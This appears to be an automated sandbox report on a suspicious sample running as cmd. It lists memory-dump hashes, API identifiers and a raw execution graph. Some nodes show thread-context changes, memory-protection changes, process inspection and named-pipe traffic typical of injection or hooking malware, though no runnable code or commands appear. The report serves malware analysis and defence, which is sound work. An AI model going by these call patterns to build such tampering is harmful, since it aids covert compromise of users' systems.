                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: a2d7bac548f64c6641c0da22163e8fcf6c740905a7ad725696579701c3137af0
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 4A91E532F58E5989FB63CF669C583AD2BA0F344BC9F446106DE8A93E85DB34C655C308
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000253FC4428DF), ref: 00000253FC442A12
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 53138b2b42f720ce6c4b665b935f06945f6ac081d87f3f870004bad33296a20d
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 47910432F58E5989FB72CF659C58BED3BA0B344BC9F642106DE0A63E85CA35C255C708
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 88ac21b984cfa4f73fa00dece11244df0e6ebe258cea53976450c545b9cc8e37
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 7C111C36B54F088AEB00CB60EC583A933B4F759B99F441E21EE6D46BA4DF78C2648344
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: 6116db9f1cb80eed9a6fe86945f945bdc5af3c2e675b0423470b5c759d9a7b4c
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: 7D71B236AC8F8946E776DE269C483AA6B94F3847C6F412016DD4953FE8DE34C720CB08
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: 7bc5c2f6e213fd082cc04122c64bc9dcc1d7ff6d62ec540fe2d0f72d652c8876
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: 8871B232A48F8942E776EE269C483AA7794F7C47C6F912026DD4943F8ADE34C721D704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: a867ecd61067bd974513b2e0b3a8687c98aeb5c4a6070218a9a60476511a4ea9
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: BC513832B49E0C8ADB54CFA5D82CB2C3391F344BC9F015512EA4643B89D77CEA49C785
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 8fe93dd2867aaeac60564b531120a4154e86121c8c3833e7610bfa44f970d0c3
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: AE617B32908BCC81EB61DF55E85479AB7A0F785BC9F046216EB9807B99CF7CD294CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File

                                            Execution Graph

                                            Execution Coverage: 1.5%
                                            Dynamic/Decrypted Code Coverage: 0%
                                            Signature Coverage: 0%
                                            Total number of Nodes: 1366
                                            Total number of Limit Nodes: 2
9073->9081 9078 2a5af36ac34 9075->9078 9075->9080 9103 2a5af3699e0 9075->9103 9078->9080 9106 2a5af36a22c 9078->9106 9082 2a5af3699cc Is_bad_exception_allowed 9 API calls 9081->9082 9083 2a5af36afe7 __GetCurrentState 9082->9083 9084 2a5af369324 _CreateFrameInfo 9 API calls 9083->9084 9091 2a5af36b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9084->9091 9085 2a5af36b0fb 9086 2a5af369324 _CreateFrameInfo 9 API calls 9085->9086 9087 2a5af36b100 9086->9087 9088 2a5af369324 _CreateFrameInfo 9 API calls 9087->9088 9089 2a5af36b10b __FrameHandler3::GetHandlerSearchState 9087->9089 9088->9089 9089->9080 9090 2a5af3699cc 9 API calls Is_bad_exception_allowed 9090->9091 9091->9085 9091->9089 9091->9090 9163 2a5af3699f4 9091->9163 9166 2a5af369634 9093->9166 9095 2a5af3695ef __FrameHandler3::GetHandlerSearchState 9170 2a5af369540 9095->9170 9098 2a5af36afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9099 2a5af369624 9098->9099 9099->9080 9101 2a5af369324 _CreateFrameInfo 9 API calls 9100->9101 9102 2a5af3699d5 9101->9102 9102->9075 9104 2a5af369324 _CreateFrameInfo 9 API calls 9103->9104 9105 2a5af3699e9 9104->9105 9105->9078 9174 2a5af36b144 9106->9174 9109 2a5af36a6f4 9110 2a5af36a373 9111 2a5af36a645 9110->9111 9155 2a5af36a3ab 9110->9155 9111->9109 9112 2a5af36a643 9111->9112 9227 2a5af36a6fc 9111->9227 9113 2a5af369324 _CreateFrameInfo 9 API calls 9112->9113 9115 2a5af36a687 9113->9115 9115->9109 9119 2a5af368070 _invalid_parameter_noinfo 8 API calls 9115->9119 9116 2a5af36a575 9116->9112 9120 2a5af36a592 9116->9120 9122 2a5af3699cc Is_bad_exception_allowed 9 API calls 9116->9122 9117 2a5af369324 _CreateFrameInfo 9 API calls 9118 2a5af36a2da 9117->9118 9118->9115 9123 2a5af369324 _CreateFrameInfo 9 API calls 9118->9123 9121 2a5af36a69a 9119->9121 9120->9112 9127 2a5af36a5b4 9120->9127 9220 2a5af3695a4 9120->9220 9121->9080 9122->9120 9124 2a5af36a2ea 9123->9124 9126 2a5af369324 _CreateFrameInfo 9 API calls 9124->9126 9130 2a5af36a2f3 9126->9130 
9127->9112 9128 2a5af36a5ca 9127->9128 9129 2a5af36a6d7 9127->9129 9131 2a5af36a5d5 9128->9131 9134 2a5af3699cc Is_bad_exception_allowed 9 API calls 9128->9134 9132 2a5af369324 _CreateFrameInfo 9 API calls 9129->9132 9185 2a5af369a0c 9130->9185 9138 2a5af36b1dc 9 API calls 9131->9138 9135 2a5af36a6dd 9132->9135 9134->9131 9137 2a5af369324 _CreateFrameInfo 9 API calls 9135->9137 9140 2a5af36a6e6 9137->9140 9141 2a5af36a5eb 9138->9141 9139 2a5af3699e0 9 API calls 9139->9155 9143 2a5af36c2f4 14 API calls 9140->9143 9141->9112 9145 2a5af369634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9141->9145 9142 2a5af369324 _CreateFrameInfo 9 API calls 9144 2a5af36a335 9142->9144 9143->9109 9144->9110 9147 2a5af369324 _CreateFrameInfo 9 API calls 9144->9147 9146 2a5af36a605 9145->9146 9224 2a5af369838 RtlUnwindEx 9146->9224 9149 2a5af36a341 9147->9149 9150 2a5af369324 _CreateFrameInfo 9 API calls 9149->9150 9152 2a5af36a34a 9150->9152 9188 2a5af36b1dc 9152->9188 9155->9116 9155->9139 9199 2a5af36a96c 9155->9199 9213 2a5af36a158 9155->9213 9157 2a5af36a35e 9195 2a5af36b2cc 9157->9195 9159 2a5af36a6d1 9160 2a5af36c2f4 14 API calls 9159->9160 9160->9129 9161 2a5af36a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9161->9159 9162 2a5af369178 Concurrency::cancel_current_task 2 API calls 9161->9162 9162->9159 9164 2a5af369324 _CreateFrameInfo 9 API calls 9163->9164 9165 2a5af369a02 9164->9165 9165->9091 9168 2a5af369662 __FrameHandler3::GetHandlerSearchState 9166->9168 9167 2a5af3696d4 9167->9095 9168->9167 9169 2a5af36968c RtlLookupFunctionEntry 9168->9169 9169->9168 9171 2a5af36958b 9170->9171 9172 2a5af369560 9170->9172 9171->9098 9172->9171 9173 2a5af369324 _CreateFrameInfo 9 API calls 9172->9173 9173->9172 9175 2a5af36b169 __FrameHandler3::GetHandlerSearchState 9174->9175 9176 2a5af369634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9175->9176 9177 2a5af36b17e 9176->9177 9239 2a5af369db4 9177->9239 9180 2a5af36b1b3 9182 2a5af369db4 
__GetUnwindTryBlock RtlLookupFunctionEntry 9180->9182 9181 2a5af36b190 __FrameHandler3::GetHandlerSearchState 9242 2a5af369dec 9181->9242 9183 2a5af36a28e 9182->9183 9183->9109 9183->9110 9183->9117 9186 2a5af369324 _CreateFrameInfo 9 API calls 9185->9186 9187 2a5af369a1a 9186->9187 9187->9109 9187->9142 9189 2a5af36b2c3 9188->9189 9194 2a5af36b207 9188->9194 9190 2a5af36a35a 9190->9110 9190->9157 9191 2a5af3699e0 9 API calls 9191->9194 9192 2a5af3699cc Is_bad_exception_allowed 9 API calls 9192->9194 9193 2a5af36a96c 9 API calls 9193->9194 9194->9190 9194->9191 9194->9192 9194->9193 9196 2a5af36b339 9195->9196 9197 2a5af36b2e9 Is_bad_exception_allowed 9195->9197 9196->9161 9197->9196 9198 2a5af3699cc 9 API calls Is_bad_exception_allowed 9197->9198 9198->9197 9200 2a5af36aa28 9199->9200 9201 2a5af36a999 9199->9201 9200->9155 9202 2a5af3699cc Is_bad_exception_allowed 9 API calls 9201->9202 9203 2a5af36a9a2 9202->9203 9203->9200 9204 2a5af3699cc Is_bad_exception_allowed 9 API calls 9203->9204 9206 2a5af36a9bb 9203->9206 9204->9206 9205 2a5af36a9e7 9208 2a5af3699e0 9 API calls 9205->9208 9206->9200 9206->9205 9207 2a5af3699cc Is_bad_exception_allowed 9 API calls 9206->9207 9207->9205 9209 2a5af36a9fb 9208->9209 9209->9200 9210 2a5af36aa14 9209->9210 9211 2a5af3699cc Is_bad_exception_allowed 9 API calls 9209->9211 9212 2a5af3699e0 9 API calls 9210->9212 9211->9210 9212->9200 9214 2a5af369634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9213->9214 9215 2a5af36a195 9214->9215 9216 2a5af3699cc Is_bad_exception_allowed 9 API calls 9215->9216 9217 2a5af36a1cd 9216->9217 9218 2a5af369838 9 API calls 9217->9218 9219 2a5af36a211 9218->9219 9219->9155 9221 2a5af3695b8 __FrameHandler3::GetHandlerSearchState 9220->9221 9222 2a5af369540 __FrameHandler3::ExecutionInCatch 9 API calls 9221->9222 9223 2a5af3695c2 9222->9223 9223->9127 9225 2a5af368070 _invalid_parameter_noinfo 8 API calls 9224->9225 9226 2a5af369932 9225->9226 9226->9112 9228 2a5af36a735 9227->9228 
9232 2a5af36a948 9227->9232 9229 2a5af369324 _CreateFrameInfo 9 API calls 9228->9229 9230 2a5af36a73a 9229->9230 9231 2a5af36a759 EncodePointer 9230->9231 9237 2a5af36a7ac 9230->9237 9233 2a5af369324 _CreateFrameInfo 9 API calls 9231->9233 9232->9112 9234 2a5af36a769 9233->9234 9234->9237 9245 2a5af3694ec 9234->9245 9236 2a5af36a158 19 API calls 9236->9237 9237->9232 9237->9236 9238 2a5af3699cc 9 API calls Is_bad_exception_allowed 9237->9238 9238->9237 9240 2a5af369634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9239->9240 9241 2a5af369dc7 9240->9241 9241->9180 9241->9181 9243 2a5af369634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9242->9243 9244 2a5af369e06 9243->9244 9244->9183 9246 2a5af369324 _CreateFrameInfo 9 API calls 9245->9246 9247 2a5af369518 9246->9247 9247->9237 8395 2a5af370fa8 8396 2a5af370fcc 8395->8396 8397 2a5af368070 _invalid_parameter_noinfo 8 API calls 8396->8397 8398 2a5af37100e 8397->8398 8608 2a5af36c828 8609 2a5af36c82d 8608->8609 8613 2a5af36c842 8608->8613 8614 2a5af36c848 8609->8614 8615 2a5af36c88a 8614->8615 8616 2a5af36c892 8614->8616 8617 2a5af36d2a0 __free_lconv_mon 13 API calls 8615->8617 8618 2a5af36d2a0 __free_lconv_mon 13 API calls 8616->8618 8617->8616 8619 2a5af36c89f 8618->8619 8620 2a5af36d2a0 __free_lconv_mon 13 API calls 8619->8620 8621 2a5af36c8ac 8620->8621 8622 2a5af36d2a0 __free_lconv_mon 13 API calls 8621->8622 8623 2a5af36c8b9 8622->8623 8624 2a5af36d2a0 __free_lconv_mon 13 API calls 8623->8624 8625 2a5af36c8c6 8624->8625 8626 2a5af36d2a0 __free_lconv_mon 13 API calls 8625->8626 8627 2a5af36c8d3 8626->8627 8628 2a5af36d2a0 __free_lconv_mon 13 API calls 8627->8628 8629 2a5af36c8e0 8628->8629 8630 2a5af36d2a0 __free_lconv_mon 13 API calls 8629->8630 8631 2a5af36c8ed 8630->8631 8632 2a5af36d2a0 __free_lconv_mon 13 API calls 8631->8632 8633 2a5af36c8fd 8632->8633 8634 2a5af36d2a0 __free_lconv_mon 13 API calls 8633->8634 8635 2a5af36c90d 8634->8635 8640 2a5af36c6f8 8635->8640 8654 
2a5af36c558 EnterCriticalSection 8640->8654 8399 2a5af3633a8 8401 2a5af3633cf 8399->8401 8400 2a5af36349c 8401->8400 8402 2a5af3633ec PdhGetCounterInfoW 8401->8402 8402->8400 8403 2a5af36340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8402->8403 8404 2a5af363488 GetProcessHeap HeapFree 8403->8404 8405 2a5af363440 StrCmpW 8403->8405 8404->8400 8405->8404 8407 2a5af363455 8405->8407 8407->8404 8408 2a5af363950 StrCmpNW 8407->8408 8409 2a5af363982 StrStrW 8408->8409 8412 2a5af3639f2 8408->8412 8410 2a5af36399b StrToIntW 8409->8410 8409->8412 8411 2a5af3639c3 8410->8411 8410->8412 8411->8412 8418 2a5af361a30 OpenProcess 8411->8418 8412->8407 8419 2a5af361ab6 8418->8419 8420 2a5af361a64 K32GetModuleFileNameExW 8418->8420 8419->8412 8424 2a5af363f88 8419->8424 8421 2a5af361aad CloseHandle 8420->8421 8422 2a5af361a7e PathFindFileNameW lstrlenW 8420->8422 8421->8419 8422->8421 8423 2a5af361a9c StrCpyW 8422->8423 8423->8421 8425 2a5af363f95 StrCmpNIW 8424->8425 8426 2a5af3639e4 8424->8426 8425->8426 8426->8412 8427 2a5af361cfc 8426->8427 8428 2a5af361d1c 8427->8428 8429 2a5af361d13 8427->8429 8428->8412 8430 2a5af361530 2 API calls 8429->8430 8430->8428 7788 2a5af36bd34 7789 2a5af36bd4d 7788->7789 7799 2a5af36bd49 7788->7799 7803 2a5af36e864 7789->7803 7794 2a5af36bd6b 7829 2a5af36bda8 7794->7829 7795 2a5af36bd5f 7797 2a5af36d2a0 __free_lconv_mon 13 API calls 7795->7797 7797->7799 7800 2a5af36d2a0 __free_lconv_mon 13 API calls 7801 2a5af36bd92 7800->7801 7802 2a5af36d2a0 __free_lconv_mon 13 API calls 7801->7802 7802->7799 7804 2a5af36e871 7803->7804 7805 2a5af36bd52 7803->7805 7848 2a5af36cacc 7804->7848 7809 2a5af36edc8 GetEnvironmentStringsW 7805->7809 7807 2a5af36e8a0 7853 2a5af36e53c 7807->7853 7810 2a5af36bd57 7809->7810 7811 2a5af36edf8 7809->7811 7810->7794 7810->7795 7812 2a5af36ece8 WideCharToMultiByte 7811->7812 7813 2a5af36ee49 7812->7813 7814 2a5af36ee53 FreeEnvironmentStringsW 7813->7814 7815 2a5af36c5d0 14 API calls 7813->7815 7814->7810 7816 2a5af36ee63 
7815->7816 7817 2a5af36ee6b 7816->7817 7818 2a5af36ee74 7816->7818 7819 2a5af36d2a0 __free_lconv_mon 13 API calls 7817->7819 7820 2a5af36ece8 WideCharToMultiByte 7818->7820 7821 2a5af36ee72 7819->7821 7822 2a5af36ee97 7820->7822 7821->7814 7823 2a5af36ee9b 7822->7823 7824 2a5af36eea5 7822->7824 7826 2a5af36d2a0 __free_lconv_mon 13 API calls 7823->7826 7825 2a5af36d2a0 __free_lconv_mon 13 API calls 7824->7825 7827 2a5af36eea3 FreeEnvironmentStringsW 7825->7827 7826->7827 7827->7810 7830 2a5af36bdcd 7829->7830 7831 2a5af36d220 __free_lconv_mon 13 API calls 7830->7831 7842 2a5af36be03 7831->7842 7832 2a5af36be0b 7833 2a5af36d2a0 __free_lconv_mon 13 API calls 7832->7833 7835 2a5af36bd73 7833->7835 7834 2a5af36be6d 7836 2a5af36d2a0 __free_lconv_mon 13 API calls 7834->7836 7835->7800 7836->7835 7837 2a5af36d220 __free_lconv_mon 13 API calls 7837->7842 7838 2a5af36be92 8044 2a5af36bebc 7838->8044 7840 2a5af36c328 __std_exception_copy 38 API calls 7840->7842 7842->7832 7842->7834 7842->7837 7842->7838 7842->7840 7843 2a5af36bea6 7842->7843 7845 2a5af36d2a0 __free_lconv_mon 13 API calls 7842->7845 7846 2a5af36d06c _invalid_parameter_noinfo 17 API calls 7843->7846 7844 2a5af36d2a0 __free_lconv_mon 13 API calls 7844->7832 7845->7842 7847 2a5af36beb9 7846->7847 7849 2a5af36cae8 FlsGetValue 7848->7849 7850 2a5af36cae4 7848->7850 7849->7850 7851 2a5af36c940 __free_lconv_mon 13 API calls 7850->7851 7852 2a5af36cafe 7850->7852 7851->7852 7852->7807 7876 2a5af36e7ac 7853->7876 7858 2a5af36e58e 7858->7805 7861 2a5af36e5a7 7862 2a5af36d2a0 __free_lconv_mon 13 API calls 7861->7862 7862->7858 7863 2a5af36e5b6 7863->7863 7902 2a5af36e8e0 7863->7902 7866 2a5af36e6b2 7867 2a5af36d1f4 __free_lconv_mon 13 API calls 7866->7867 7868 2a5af36e6b7 7867->7868 7870 2a5af36d2a0 __free_lconv_mon 13 API calls 7868->7870 7869 2a5af36e70d 7872 2a5af36e774 7869->7872 7913 2a5af36e05c 7869->7913 7870->7858 7871 2a5af36e6cc 7871->7869 7875 2a5af36d2a0 __free_lconv_mon 13 API calls 7871->7875 7874 
2a5af36d2a0 __free_lconv_mon 13 API calls 7872->7874 7874->7858 7875->7869 7877 2a5af36e7cf 7876->7877 7882 2a5af36e7d9 7877->7882 7928 2a5af36c558 EnterCriticalSection 7877->7928 7883 2a5af36e571 7882->7883 7885 2a5af36cacc 14 API calls 7882->7885 7888 2a5af36e22c 7883->7888 7886 2a5af36e8a0 7885->7886 7887 2a5af36e53c 56 API calls 7886->7887 7887->7883 7929 2a5af36dd78 7888->7929 7891 2a5af36e24c GetOEMCP 7893 2a5af36e273 7891->7893 7892 2a5af36e25e 7892->7893 7894 2a5af36e263 GetACP 7892->7894 7893->7858 7895 2a5af36c5d0 7893->7895 7894->7893 7896 2a5af36c61b 7895->7896 7900 2a5af36c5df __free_lconv_mon 7895->7900 7897 2a5af36d1f4 __free_lconv_mon 13 API calls 7896->7897 7899 2a5af36c619 7897->7899 7898 2a5af36c602 HeapAlloc 7898->7899 7898->7900 7899->7861 7899->7863 7900->7896 7900->7898 7901 2a5af36b470 __free_lconv_mon 2 API calls 7900->7901 7901->7900 7903 2a5af36e22c 16 API calls 7902->7903 7904 2a5af36e91b 7903->7904 7906 2a5af36e958 IsValidCodePage 7904->7906 7911 2a5af36ea71 7904->7911 7912 2a5af36e972 7904->7912 7905 2a5af368070 _invalid_parameter_noinfo 8 API calls 7907 2a5af36e6a9 7905->7907 7908 2a5af36e969 7906->7908 7906->7911 7907->7866 7907->7871 7909 2a5af36e998 GetCPInfo 7908->7909 7908->7912 7909->7911 7909->7912 7911->7905 7945 2a5af36e344 7912->7945 8043 2a5af36c558 EnterCriticalSection 7913->8043 7930 2a5af36dd9c 7929->7930 7936 2a5af36dd97 7929->7936 7931 2a5af36cab0 _invalid_parameter_noinfo 14 API calls 7930->7931 7930->7936 7932 2a5af36ddb7 7931->7932 7937 2a5af36ffb4 7932->7937 7936->7891 7936->7892 7938 2a5af36ffc9 7937->7938 7940 2a5af36ddda 7937->7940 7939 2a5af370a40 _invalid_parameter_noinfo 14 API calls 7938->7939 7938->7940 7939->7940 7941 2a5af370020 7940->7941 7942 2a5af370035 7941->7942 7944 2a5af370048 7941->7944 7943 2a5af36e8c4 _invalid_parameter_noinfo 14 API calls 7942->7943 7942->7944 7943->7944 7944->7936 7946 2a5af36e38f GetCPInfo 7945->7946 7947 2a5af36e485 7945->7947 7946->7947 7953 2a5af36e3a2 7946->7953 7948 
2a5af368070 _invalid_parameter_noinfo 8 API calls 7947->7948 7950 2a5af36e524 7948->7950 7950->7911 7956 2a5af371474 7953->7956 7957 2a5af36dd78 14 API calls 7956->7957 7958 2a5af3714b6 7957->7958 7976 2a5af36ec58 7958->7976 7978 2a5af36ec61 MultiByteToWideChar 7976->7978 8045 2a5af36be9a 8044->8045 8046 2a5af36bec1 8044->8046 8045->7844 8047 2a5af36beea 8046->8047 8048 2a5af36d2a0 __free_lconv_mon 13 API calls 8046->8048 8049 2a5af36d2a0 __free_lconv_mon 13 API calls 8047->8049 8048->8046 8049->8045 9248 2a5af362ab4 TlsGetValue TlsGetValue TlsGetValue 9249 2a5af362b0d 9248->9249 9254 2a5af362b79 9248->9254 9251 2a5af362b15 9249->9251 9249->9254 9250 2a5af362b74 9251->9250 9252 2a5af362c32 TlsSetValue TlsSetValue TlsSetValue 9251->9252 9253 2a5af363f88 StrCmpNIW 9251->9253 9252->9250 9253->9251 9254->9250 9254->9252 9255 2a5af363f88 StrCmpNIW 9254->9255 9255->9254 8656 2a5af36ec30 GetCommandLineA GetCommandLineW 8657 2a5af366430 8658 2a5af36643d 8657->8658 8659 2a5af366449 8658->8659 8665 2a5af36655a 8658->8665 8660 2a5af3664cd 8659->8660 8661 2a5af3664a6 SetThreadContext 8659->8661 8661->8660 8662 2a5af366581 VirtualProtect FlushInstructionCache 8662->8665 8663 2a5af36663e 8664 2a5af36665e 8663->8664 8667 2a5af364b20 VirtualFree 8663->8667 8666 2a5af365530 3 API calls 8664->8666 8665->8662 8665->8663 8668 2a5af366663 8666->8668 8667->8664 8669 2a5af3666b7 8668->8669 8670 2a5af366677 ResumeThread 8668->8670 8671 2a5af368070 _invalid_parameter_noinfo 8 API calls 8669->8671 8670->8668 8672 2a5af3666ff 8671->8672 8431 2a5af371398 8432 2a5af3713ae 8431->8432 8433 2a5af3713f5 8432->8433 8435 2a5af37140e 8432->8435 8434 2a5af36d1f4 __free_lconv_mon 13 API calls 8433->8434 8436 2a5af3713fa 8434->8436 8438 2a5af36dd78 14 API calls 8435->8438 8439 2a5af371405 8435->8439 8437 2a5af36d04c _invalid_parameter_noinfo 38 API calls 8436->8437 8437->8439 8438->8439 8673 2a5af36c218 8674 2a5af36d2a0 __free_lconv_mon 13 API calls 8673->8674 8675 2a5af36c228 8674->8675 8676 
2a5af36d2a0 __free_lconv_mon 13 API calls 8675->8676 8677 2a5af36c23c 8676->8677 8678 2a5af36d2a0 __free_lconv_mon 13 API calls 8677->8678 8679 2a5af36c250 8678->8679 8680 2a5af36d2a0 __free_lconv_mon 13 API calls 8679->8680 8681 2a5af36c264 8680->8681 8050 2a5af362518 GetProcessIdOfThread GetCurrentProcessId 8051 2a5af362543 CreateFileW 8050->8051 8052 2a5af3625be 8050->8052 8051->8052 8053 2a5af362577 WriteFile ReadFile CloseHandle 8051->8053 8053->8052 8682 2a5af36f820 8685 2a5af36f7d8 8682->8685 8690 2a5af36c558 EnterCriticalSection 8685->8690 8691 2a5af36fe20 8692 2a5af36fe4a 8691->8692 8693 2a5af36d220 __free_lconv_mon 13 API calls 8692->8693 8694 2a5af36fe6a 8693->8694 8695 2a5af36d2a0 __free_lconv_mon 13 API calls 8694->8695 8696 2a5af36fe78 8695->8696 8697 2a5af36d220 __free_lconv_mon 13 API calls 8696->8697 8700 2a5af36fea2 8696->8700 8699 2a5af36fe94 8697->8699 8698 2a5af36fec1 InitializeCriticalSectionEx 8698->8700 8701 2a5af36d2a0 __free_lconv_mon 13 API calls 